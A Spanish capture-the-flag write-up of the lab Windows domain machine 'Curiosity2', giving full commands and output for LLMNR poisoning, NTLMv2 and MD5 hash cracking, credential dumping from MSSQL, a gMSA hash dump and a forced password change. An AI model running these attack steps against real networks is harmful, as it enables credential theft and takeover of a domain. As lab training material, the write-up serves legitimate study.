THL - Curiosity2 | (Difficulty Medium) - Windows
Writeup de la máquina de dificultad media Curiosity2 de la página https://thehackerslabs.com
Useful Skills
- DNS Enumeration
- RCP Enumeration
- SMB Enumeration
- LLMNR Poisoning
- Cracking hashes
- BloodHound analysis
- MSSQL data lekeage (sqlcmd)
- KDBX file brute force
- Abusing ReadGMSAPassword permission
- Abusing ForceChangePassword permission
- DCSync Attack
- Pass The Hash
Enumeration
TCP Scan
1
2
rustscan -a 192.168.1.141 --ulimit 5000 -g
192.168.1.141 -> [53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49691,49692,49695,49703,49714,49750,57936]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49691,49692,49695,49703,49714,49750,57936 -sCV 192.168.1.141 -oN tcpScan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-12 15:03 CET
Nmap scan report for 192.168.1.141 (192.168.1.141)
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-02-12 14:02:56Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
|_ssl-date: 2025-02-12T14:03:58+00:00; -41s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
|_ssl-date: 2025-02-12T14:03:58+00:00; -41s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
|_ssl-date: 2025-02-12T14:03:58+00:00; -41s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
|_ssl-date: 2025-02-12T14:03:58+00:00; -41s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49691/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49692/tcp open msrpc Microsoft Windows RPC
49695/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
49750/tcp open msrpc Microsoft Windows RPC
57936/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ssl-date: 2025-02-12T14:03:58+00:00; -41s from scanner time.
| ms-sql-info:
| 192.168.1.141\SQLEXPRESS:
| Instance name: SQLEXPRESS
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
| TCP port: 57936
|_ Clustered: false
| ms-sql-ntlm-info:
| 192.168.1.141\SQLEXPRESS:
| Target_Name: CONS
| NetBIOS_Domain_Name: CONS
| NetBIOS_Computer_Name: WIN-C73PROQLRHL
| DNS_Domain_Name: cons.thl
| DNS_Computer_Name: WIN-C73PROQLRHL.cons.thl
|_ Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
MAC Address: 08:00:27:33:E8:5A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-C73PROQLRHL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-02-12T14:03:50
|_ start_date: 2025-02-12T13:38:50
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: WIN-C73PROQLRHL, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:33:e8:5a (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
|_clock-skew: mean: -40s, deviation: 0s, median: -41s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 68.14 seconds
UDP Scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
nmap -sU --top-ports 1500 --min-rate 5000 -n -Pn 192.168.1.141 -oN udpScan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-12 15:14 CET
Nmap scan report for 192.168.1.141
Host is up (0.00043s latency).
Not shown: 1327 open|filtered udp ports (no-response), 168 closed udp ports (port-unreach)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
137/udp open netbios-ns
389/udp open ldap
MAC Address: 08:00:27:33:E8:5A (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
Hay que añadir el dominio cons.thl y el FQDN WIN-C73PROQLRHL.cons.thl en el archivo de configuración /etc/hosts para que se pueda resolver el nombre de dominio a la dirección IP 192.168.1.141
DNS Enumeration
Intento obtener información adicional sobre el dominio a través de consultas DNS con dig, donde intento obtener los registros NS, MX, CNAME entre otros, posteriormente, trato de realizar una transferencia de zona, pero esta resulta fallida.
1
2
3
4
5
6
7
dig cons.thl@192.168.1.141 axfr
;; communications error to 212.230.135.1#53: connection reset
;; communications error to 212.230.135.1#53: connection reset
; <<>> DiG 9.20.4-4-Debian <<>> cons.thl@192.168.1.141 axfr
;; global options: +cmd
; Transfer failed.
RPC Enumeration
Utilizo un null session para intentar enumerar información de todo los usuarios a través de RPC, pero el null session no se encuentra habilitado
1
2
rpcclient 192.168.1.141 -U "" -N -c enumdomusers
result was NT_STATUS_ACCESS_DENIED
SMB Enumeration
Utilizo NetExec para realizar un escaneo de SMB y obtener información clave como el sistema operativo, nombre del servidor, dominio, si la firma smb está habilita y si la versión antigua SMBv1 está activada o desactivada.
1
2
nxc smb 192.168.1.141
SMB 192.168.1.141 445 WIN-C73PROQLRHL [*] Windows 10.0 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
Utilizo NetExec para enumerar los recursos compartidos del sistema a través del protocolo SMB con autenticación nula, pero no es posible
1
2
3
nxc smb 192.168.1.141 -u ' ' -p '' --shares
SMB 192.168.1.141 445 WIN-C73PROQLRHL [*] Windows 10.0 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
SMB 192.168.1.141 445 WIN-C73PROQLRHL [-] cons.thl\ : STATUS_LOGON_FAILURE
Exploitation
LLMNR Poisoning
Ejecuto la herramienta responder y la dejo en segundo plano, para así intentar capturar hashes NTLMv2 de usuarios autenticados en la red. Si algún usuario del dominio intenta acceder a un recurso de red (SMB, Servidor, Web, etc…) y por alguna razón el recurso no existe Windows intenta resolver el nombre usando LLMNR o NetBIOS, lo que desembocará en que Windows envíe las credenciales del usuario en forma de hash NTLMv2 a mi recurso falso.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
python3 Responder.py -I eth0 -wd
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.5.0
[+] Listening for events...
[*] [DHCP] Found DHCP server IP: 192.168.1.1, now waiting for incoming requests...
[*] [NBT-NS] Poisoned answer sent to 192.168.1.141 for name SQLSERVER (service: File Server)
[*] [LLMNR] Poisoned answer sent to fe80::3d0a:35b8:63ba:f20c for name SQLserver
[*] [LLMNR] Poisoned answer sent to 192.168.1.141 for name SQLserver
[*] [LLMNR] Poisoned answer sent to fe80::edbb:5300:a871:5b46 for name SQLserver
[*] [LLMNR] Poisoned answer sent to 192.168.56.116 for name SQLserver
[*] [LLMNR] Poisoned answer sent to fe80::3d0a:35b8:63ba:f20c for name SQLserver
[*] [LLMNR] Poisoned answer sent to 192.168.1.141 for name SQLserver
[*] [LLMNR] Poisoned answer sent to fe80::edbb:5300:a871:5b46 for name SQLserver
[*] [LLMNR] Poisoned answer sent to 192.168.56.116 for name SQLserver
[SMB] NTLMv2-SSP Client : fe80::3d0a:35b8:63ba:f20c
[SMB] NTLMv2-SSP Username : cons\Appolonia
[SMB] NTLMv2-SSP Hash : Appolonia::cons:75b0f3798ba586c9:B04333BF8D9A97F05004483C1A16B6A0:010100000000000080E74E8B637DDB0126D48CF562AB6DD70000000002000800550039004A005A0001001E00570049004E002D00370032003500390050005A004E00340042004500490004003400570049004E002D00370032003500390050005A004E0034004200450049002E00550039004A005A002E004C004F00430041004C0003001400550039004A005A002E004C004F00430041004C0005001400550039004A005A002E004C004F00430041004C000700080080E74E8B637DDB0106000400020000000800300030000000000000000000000000400000BB516A93EF2A74F2D3D59C325B808C11E36190226F6C34244A099287A4F019190A0010000000000000000000000000000000000009001C0063006900660073002F00530051004C00730065007200760065007200000000000000000000000000
[*] [LLMNR] Poisoned answer sent to fe80::3d0a:35b8:63ba:f20c for name SQLDatababase
[*] [NBT-NS] Poisoned answer sent to 192.168.1.141 for name SQLDATABABASE (service: File Server)
[*] [LLMNR] Poisoned answer sent to 192.168.1.141 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to fe80::edbb:5300:a871:5b46 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to 192.168.56.116 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to fe80::3d0a:35b8:63ba:f20c for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to 192.168.1.141 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to fe80::edbb:5300:a871:5b46 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to 192.168.56.116 for name SQLDatababase
[SMB] NTLMv2-SSP Client : fe80::3d0a:35b8:63ba:f20c
[SMB] NTLMv2-SSP Username : cons\sqldb
[SMB] NTLMv2-SSP Hash : sqldb::cons:c8261e0addf2204d:0F73062D51212E6E7FAC095A398DAAAE:010100000000000080E74E8B637DDB012DF3F96799F1DC410000000002000800550039004A005A0001001E00570049004E002D00370032003500390050005A004E00340042004500490004003400570049004E002D00370032003500390050005A004E0034004200450049002E00550039004A005A002E004C004F00430041004C0003001400550039004A005A002E004C004F00430041004C0005001400550039004A005A002E004C004F00430041004C000700080080E74E8B637DDB0106000400020000000800300030000000000000000000000000400000BB516A93EF2A74F2D3D59C325B808C11E36190226F6C34244A099287A4F019190A001000000000000000000000000000000000000900240063006900660073002F00530051004C004400610074006100620061006200610073006500000000000000000000000000
Tras un rato de espera consigo obtener dos hashes NTLMv2, los cuals consigo crackear de forma offline con john, como no conseguía encontrar la contraseña utilice un bucle for que iterase sobre todos los diccionarios de la categoría Passwords de seclists, consiguiendo así crackear los hashes, las crdenciale son sqldb:au7umn@, Appolonia:5umm3r@
1
2
3
4
5
6
7
8
9
10
for dict in /usr/share/seclists/Passwords/*.txt;do john --wordlist=$dict hashes;done
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 32 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
au7umn@ (sqldb)
5umm3r@ (Appolonia)
2g 0:00:00:00 DONE (2025-02-12 15:45) 50.00g/s 134750p/s 269500c/s 269500C/s $pr1ng..W!NTER2022$
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
Utilizo NetExec para validar las crdenciales de los usuarios
1
2
3
4
5
6
nxc smb 192.168.1.141 -u users -p passwords --continue-on-success
SMB 192.168.1.141 445 WIN-C73PROQLRHL [*] Windows 10.0 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
SMB 192.168.1.14 445 WIN-C73PROQLRHL [+] cons.thl\sqldb:au7umn@
SMB 192.168.1.141 445 WIN-C73PROQLRHL [-] cons.thl\sqldb:5umm3r@ STATUS_LOGON_FAILURE
SMB 192.168.1.141 445 WIN-C73PROQLRHL [-] cons.thl\Appolonia:au7umn@ STATUS_LOGON_FAILURE
SMB 192.168.1.141 445 WIN-C73PROQLRHL [+] cons.thl\Appolonia:5umm3r@
Gain access
Verifico con NetExec si puedo acceder al sistema mediante el servicio WinRM con algunos de los usuarios obtenidos hasta ahora. Obtengo un (Pwned!) con el usuario Appolonia y con sqldb lo que indica que las credenciales proporcionadas son válidas para autenticarse con WinRM
1
2
3
4
5
6
7
crackmapexec winrm 192.168.1.141 -u users -p passwords --continue-on-success
SMB 192.168.1.14 5985 WIN-C73PROQLRHL [*] Windows 10.0 Build 14393 (name:WIN-C73PROQLRHL) (domain:cons.thl)
HTTP 192.168.1.141 5985 WIN-C73PROQLRHL [*] http://192.168.1.141:5985/wsman
WINRM 192.168.1.141 5985 WIN-C73PROQLRHL [+] cons.thl\sqldb:au7umn@ (Pwn3d!)
WINRM 192.168.1.141 5985 WIN-C73PROQLRHL [-] cons.thl\sqldb:5umm3r@
WINRM 192.168.1.141 5985 WIN-C73PROQLRHL [-] cons.thl\Appolonia:au7umn@
WINRM 192.168.1.141 5985 WIN-C73PROQLRHL [+] cons.thl\Appolonia:5umm3r@ (Pwn3d!)
Accedo con evil-winrm como el usuario Appolonia
1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 192.168.1.141 -u Appolonia -p '5umm3r@'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\appolonia\Documents> whoami
cons\appolonia
Post exploitation
User Pivoting
Utilizo BloodHound para identificar puntos débiles en la configuración de Active Directory que me puedan permitir escalar mis privilegios
1
2
3
4
5
6
7
*Evil-WinRM* PS C:\Users\appolonia\Documents\BloodHound> upload SharpHound.exe
Info: Uploading /home/ju4ncaa/Documentos/Hacking/Curiosity2/content/SharpHound.exe to C:\Users\appolonia\Documents\BloodHound\SharpHound.exe
Data: 2076672 bytes of 2076672 bytes copied
Info: Upload successful!
Subo SharpHound a través de evil-winrm para recopilar datos del controlador de dominio
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
*Evil-WinRM* PS C:\Users\appolonia\Documents\BloodHound> .\SharpHound.exe -c All
2025-02-12T17:00:32.6977253+01:00|INFORMATION|This version of SharpHound is compatible with the 5.0.0 Release of BloodHound
2025-02-12T17:00:32.7917713+01:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-02-12T17:00:32.8073944+01:00|INFORMATION|Initializing SharpHound at 17:00 on 12/02/2025
2025-02-12T17:00:32.8230262+01:00|INFORMATION|Resolved current domain to cons.thl
2025-02-12T17:00:32.9012604+01:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote, UserRights, CARegistry, DCRegistry, CertServices
2025-02-12T17:00:32.9481305+01:00|INFORMATION|Beginning LDAP search for cons.thl
2025-02-12T17:00:33.0100134+01:00|INFORMATION|Beginning LDAP search for cons.thl Configuration NC
2025-02-12T17:00:33.0256389+01:00|INFORMATION|Producer has finished, closing LDAP channel
2025-02-12T17:00:33.0256389+01:00|INFORMATION|LDAP channel closed, waiting for consumers
2025-02-12T17:00:33.0568863+01:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONS.THL
2025-02-12T17:00:33.1664994+01:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONS.THL
2025-02-12T17:00:33.2599383+01:00|INFORMATION|[CommonLib ACLProc]Building GUID Cache for CONS.THL
2025-02-12T17:00:33.7755158+01:00|INFORMATION|Consumers finished, closing output channel
2025-02-12T17:00:33.7911940+01:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2025-02-12T17:00:33.9629393+01:00|INFORMATION|Status: 440 objects finished (+440 440)/s -- Using 61 MB RAM
2025-02-12T17:00:33.9629393+01:00|INFORMATION|Enumeration finished in 00:00:01.0231610
2025-02-12T17:00:34.0254925+01:00|INFORMATION|Saving cache with stats: 24 ID to type mappings.
1 name to SID mappings.
1 machine sid mappings.
4 sid to domain mappings.
0 global catalog mappings.
2025-02-12T17:00:34.0412951+01:00|INFORMATION|SharpHound Enumeration Completed at 17:00 on 12/02/2025! Happy Graphing!
Una vez ejecutado se crean dos archivos un .bin y .zip, el archivo .zip es el que hay cargar en BloodHound por lo que lo descargo con evil-winrm
1
2
3
4
5
6
7
8
9
*Evil-WinRM* PS C:\Users\appolonia\Documents\BloodHound> dir
Directory: C:\Users\appolonia\Documents\BloodHound
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/12/2025 5:00 PM 38937 20250212170033_BloodHound.zip
-a---- 2/12/2025 5:00 PM 1910 NzAyMzNmYzYtYzFjNi00MDYxLTg5ZTYtY2FmOWMwODg1MzZm.bin
-a---- 2/12/2025 4:59 PM 1557504 SharpHound.exe
1
2
3
4
5
*Evil-WinRM* PS C:\Users\appolonia\Documents\BloodHound> download 20250212170033_BloodHound.zip
Info: Downloading C:\Users\appolonia\Documents\BloodHound\20250212170033_BloodHound.zip to 20250212170033_BloodHound.zip
Info: Download successful!
Una vez descargado el .zip inicio neo4j y cargo el archivo en BloodHound
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
logs: /etc/neo4j/logs
plugins: /usr/share/neo4j/plugins
import: /usr/share/neo4j/import
data: /etc/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses: /usr/share/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2025-02-12 16:03:37.643+0000 INFO Starting...
2025-02-12 16:03:37.845+0000 INFO This instance is ServerId{489d6a72} (489d6a72-6029-479a-89d6-e4a21e9ebc70)
2025-02-12 16:03:38.394+0000 INFO ======== Neo4j 4.4.26 ========
2025-02-12 16:03:38.945+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-02-12 16:03:38.946+0000 INFO Updating the initial password in component 'security-users'
2025-02-12 16:03:39.523+0000 INFO Bolt enabled on localhost:7687.
2025-02-12 16:03:39.895+0000 INFO Remote interface available at http://localhost:7474/
2025-02-12 16:03:39.897+0000 INFO id: A59061A79F1A9CB3877073C6E5598848BA9042EEDC862DCD1F077E623A63341F
2025-02-12 16:03:39.897+0000 INFO name: system
2025-02-12 16:03:39.897+0000 INFO creationDate: 2025-02-11T16:29:11.83Z
2025-02-12 16:03:39.897+0000 INFO Started.
El usuario Appolonia pertenece al grupo Support, pero los miembros de este grupo no pueden realizar nigun acción interesante
Accedo con el evil-winrm como el usuario sqldb, seguramente es un usuario relaciones con bases de datos
1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 192.168.1.141 -u 'sqldb' -p 'au7umn@'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sqldb\Documents> whoami
cons\sqldb
Consulto el registro de Windows con el comando Get-ItemProperty para intentar obtener los servicios del sistema relacionados con SQL
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\sqldb\Documents> Get-ItemProperty -Path "HKLM:\Software\Microsoft\Microsoft SQL Server\Instance Names\SQL"
SQLEXPRESS : MSSQL15.SQLEXPRESS
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Microsoft SQL Server\Instance Names\SQL
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Microsoft SQL Server\Instance Names
PSChildName : SQL
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Visualizo que existe un servidor MSSQL llamado SQLEXPRESS, por lo que puedo comenzar a enumerar información, con la herramienta sqlcmd, la cual sirve para ejecutar consultas en terminal
Enumero las bases de datos existentes y visualizo varias bases de datos, pero CredentialsDB por su nombre parece bastante jugosa
1
2
3
4
5
6
7
8
9
10
11
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -S cons.thl\SQLEXPRESS -E -Q "select name from sys.databases"
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
CredentialsDB
toolsdb
(6 rows affected)
Enumero las tablas de la base de datos CredentialsDB, solamente existe una tabla llamada Credentials
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -S cons.thl\SQLEXPRESS -E -Q "select table_name from CredentialsDB.information_schema.tables"
table_name
--------------------------------------------------------------------------------------------------------------------------------
Credentials
(1 rows affected)
Enumero las columnas de la tabla Credentials de la base de datos CredentialsDB, observo 3 columnas ID, Password, Username
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -S cons.thl\SQLEXPRESS -E -Q "select column_name from CredentialsDB.information_schema.columns"
column_name
--------------------------------------------------------------------------------------------------------------------------------
ID
Password
Username
(3 rows affected)
Por ultimo realizo la consulta para obtener la información de la tabla Credentials, consiguiendo obtener la contraseña del usuario sqlsvc
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -S cons.thl\SQLEXPRESS -E -Q "select * from CredentialsDB.dbo.Credentials"
ID Username Password
----------- -------------------------------------------------- ----------------------------------------------------------------------------------------------------
1 sqlsvc a6d888301de7aa3b380a691d32837627
(1 rows affected)
Utilizo john para intentar cracker la contraseña, consigo obtenerla, la cual es $PRING2021#
1
2
3
4
5
6
7
8
9
for dict in /usr/share/seclists/Passwords/*.txt;do john --wordlist=$dict hash --format=Raw-MD5;done
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=32
Press 'q' or Ctrl-C to abort, almost any other key for status
$PRING2021# (?)
1g 0:00:00:00 DONE (2025-02-12 17:21) 50.00g/s 19200p/s 19200c/s 19200C/s $pr1ng..$umm3r2021%
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
Accedo como el usuario sqlsvc con evil-winrm y observo un archivo de base de datos KeePass
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
evil-winrm -i 192.168.1.141 -u sqlsvc -p '$PRING2021#'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> ls
Directory: C:\Users\sqlsvc\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/31/2024 6:23 PM 2231 Database.kdbx
Intento utilizar keepass2john para obtener un hash el cual crackear coon john, pero el archivo .kdbx pertenece a una versión no soportada por keepass2john
1
2
keepass2john Database.kdbx
! Database.kdbx : File version '40000' is currently not supported!
Intento utilizar la herramienta keepass4brute, esta herramienta es una alternativa para archivos kdbx 4.x no soportados por keepass2john, lo que hace es intentar obtener la contraseña a través de un ataque por diccionario, pero no consigo obtener la contraseña
1
2
3
4
5
6
./keepass4brute.sh Database.kdbx /usr/share/seclists/Passwords/seasons.txt
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 5390/5390 - Attempts per minute: 2277 - Estimated time remaining: 0 seconds
[!] Wordlist exhausted, no match found
Utilizo BloodHound y observo que el usuario SQLSVC pertenece al grupo SVC_ACCOUNTS, los miembros de esto grupo tienen el permiso ReadGMSAPassword sobre el usuario GMSA_SQL, lo que permite obtener el hash de la cuenta
Utilizo la herramienta gMSADumper para obtener el hash de la cuenta GMSA_SQL
1
2
3
4
5
6
python3 gMSADumper.py -u sqlsvc -p '$PRING2021#' -d cons.thl
Users or groups who can read password for GMSA_SQL$:
> Svc_Accounts
GMSA_SQL$:::63c0347cfd7786d19cef5771afc8553d
GMSA_SQL$:aes256-cts-hmac-sha1-96:19612b1173c73481cdf626bdb9e562cbdf3e90847f0024346a399b77a8bfac4b
GMSA_SQL$:aes128-cts-hmac-sha1-96:a769d177e8cc799957eecfb56ffa0363
En BloodHound observo que el usuario GMSA_SQL posee el permiso GenericWrite y ForceChangePassword sobre el usuario TOOLSDB
Opto por aprovecharme de ForceChangePassword, utilizando bloodyAD
1
2
python3 bloodyAD.py --host 192.168.1.141 -d cons.thl -u 'GMSA_SQL$' -p :63c0347cfd7786d19cef5771afc8553d set password toolsdb 'Password123!'
[+] Password changed successfully!
Accedo mediante evil-winrm como el usuario toolsdb con la contraseña establecida, la cual es Password123!
1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 192.168.1.143 -u toolsdb -p 'Password123!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\toolsdb\Documents> whoami
cons\toolsdb
Recuerdo que enumerando el servidor MSSQL existía una base de datos llamada como el usuario como que me encuentro autenticado en este momento, es decir, el usuario toolsdb. Por ello intentar como este usuario acceder al contenido de dicha base de datos, comenzaré directamente enumerando las tablas de la base de datos toolsdb, consigo observar que existe una tabla llamada users
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -S cons.thl\SQLEXPRESS -E -Q "select table_name from toolsdb.information_schema.tables"
table_name
--------------------------------------------------------------------------------------------------------------------------------
users
(1 rows affected)
Enumero las columnas de tabla users de la base de datos toolsdb, veo que existen tres columnas, id, password y username
1
2
3
4
5
6
7
8
*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -S cons.thl\SQLEXPRESS -E -Q "select column_name from toolsdb.information_schema.columns"
column_name
--------------------------------------------------------------------------------------------------------------------------------
id
password
username
(3 rows affected)
Ejecuto una consulta para obtener todos los usuario y las contraseñas de la tabla users de la base de datos toolsdb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -S cons.thl\SQLEXPRESS -E -Q "select * from toolsdb.dbo.users"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 user_6B482050 433129A1!@1
2 user_47F7501A 64409A1C!@1
3 user_515A0C58 CAD616E3!@1
4 user_CA843BF2 731C60AD!@1
5 user_AA2B9FF8 8E181E5F!@1
6 user_F6E6A108 47862562!@1
7 user_8D56BAE8 425B6335!@1
8 user_BA9B1295 E4FC1AC4!@1
9 user_66B7DBEE 4EE216A3!@1
10 user_E75B7C23 4CD89A92!@1
(10 rows affected)
Se me ocurre con las contraseñas obtenidas utilizarlas para mediante la herramienta keepass4brute realizar una ataque por diccionario al fichero .kdbx, consigo obtener la contraseña de la base de datos KeePass, la cual es 8E181E5F!@1
1
2
3
4
5
6
7
8
./keepass4brute.sh Database.kdbx passwords
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
